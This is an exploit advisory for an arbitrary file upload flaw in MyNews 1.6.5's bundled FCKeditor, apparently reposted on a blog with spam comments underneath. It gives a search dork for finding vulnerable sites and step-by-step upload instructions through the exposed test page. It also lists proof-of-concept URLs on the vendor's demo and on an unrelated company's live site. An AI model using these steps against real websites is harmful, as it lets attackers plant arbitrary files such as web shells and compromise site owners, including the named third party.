MyNews Arbitrary File Upload Vuln

[o] MyNews Arbitrary File Upload Vulnerability

Software : MyNews 1.6.5
Vendor : http://www.planetluc.com/
Dork : "Powered by MyNews"
Author : NoGe


[o] Exploit

FCKeditor/editor/filemanager/upload/php/config.php

// SECURITY: You must explicitelly enable this "uploader".

$Config['Enabled'] = true ;

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

in the "File Uploader" section, select "PHP"
browse file u want to upload and click "Send it to the Server"
if the file uploaded with no error, u will see the file path in "Uploaded File URL"

http://localhost/[path]/files/your_file.txt


[o] PoC

http://www.planetluc.com/en/demo/mynews/FCKeditor/editor/filemanager/upload/test.html
http://www.conveyorsystemsltd.co.uk/FCKeditor/editor/filemanager/upload/test.html

2 Responses so far.

  1. Pretty good post, this is one of the best articles that I have ever seen !
    -------------------------------
    uk essay

  2. Your blog is excellent. Let me inform u one thing that post have become most up-to-date and vital source of quality free information.
    --------------------------------
    Custom Dissertations